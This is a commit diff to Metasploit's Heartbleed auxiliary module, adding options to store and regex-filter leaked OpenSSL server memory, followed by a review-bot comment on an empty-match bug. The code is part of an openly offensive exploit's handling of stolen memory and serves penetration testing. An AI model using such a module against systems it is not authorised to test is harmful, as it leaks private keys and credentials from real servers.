Land #3232, Heartbleed memory dump filtering

bug/bundler_fix
William Vu 2014-04-11 12:46:01 -05:00
commit 6599999b8a
No known key found for this signature in database
GPG Key ID: E761DCB4C1629024
1 changed files with 22 additions and 11 deletions


@ -100,7 +100,8 @@ class Metasploit3 < Msf::Auxiliary
'FiloSottile', # PoC site and tool 'FiloSottile', # PoC site and tool
'Christian Mehlmauer', # Msf module 'Christian Mehlmauer', # Msf module
'wvu', # Msf module 'wvu', # Msf module
'juan vazquez' # Msf module 'juan vazquez', # Msf module
'Sebastiano Di Paola' # Msf module
], ],
'References' => 'References' =>
[ [
@ -120,7 +121,9 @@ class Metasploit3 < Msf::Auxiliary
[ [
Opt::RPORT(443), Opt::RPORT(443),
OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP' ]]), OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP' ]]),
OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']]) OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']]),
OptBool.new('STOREDUMP', [true, 'Store leaked memory in a file', false]),
OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil])
], self.class) ], self.class)
register_advanced_options( register_advanced_options(
@ -291,16 +294,24 @@ class Metasploit3 < Msf::Auxiliary
:refs => self.references, :refs => self.references,
:info => "Module #{self.fullname} successfully leaked info" :info => "Module #{self.fullname} successfully leaked info"
}) })
path = store_loot( if datastore['STOREDUMP']
"openssl.heartbleed.server", pattern = datastore['DUMPFILTER']
"application/octet-stream", if pattern
ip, match_data = heartbeat_data.scan(pattern).join
heartbeat_data, else
nil, match_data = heartbeat_data
"OpenSSL Heartbleed server memory" end
) path = store_loot(
"openssl.heartbleed.server",
"application/octet-stream",
ip,
match_data,
nil,
"OpenSSL Heartbleed server memory"
)
print_status("#{peer} - Heartbeat data stored in #{path}")
end
vprint_status("#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}") vprint_status("#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}")
print_status("#{peer} - Heartbeat data stored in #{path}")
else else
vprint_error("#{peer} - Looks like there isn't leaked information...") vprint_error("#{peer} - Looks like there isn't leaked information...")
end end
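Review bot: When DUMPFILTER is set and matches nothing, `heartbeat_data.scan(pattern).join` in the third hunk yields an empty string, yet `store_loot` still runs and "Heartbeat data stored in ..." is printed, so an empty loot file is recorded as if memory had been captured. Wrap the store and its status line in `unless match_data.empty?` and report the no-match case with a `vprint_status` instead. The matches are also concatenated with no separator, and a pattern with capture groups stores only the captured groups, because `scan` then returns nested arrays that `join` flattens. The DUMPFILTER description, currently `'Pattern to filter leaked memory before storing'`, should state both behaviours. The enclosing method starts and ends outside the hunk, so how `heartbeat_data` is encoded before `scan` cannot be checked from here.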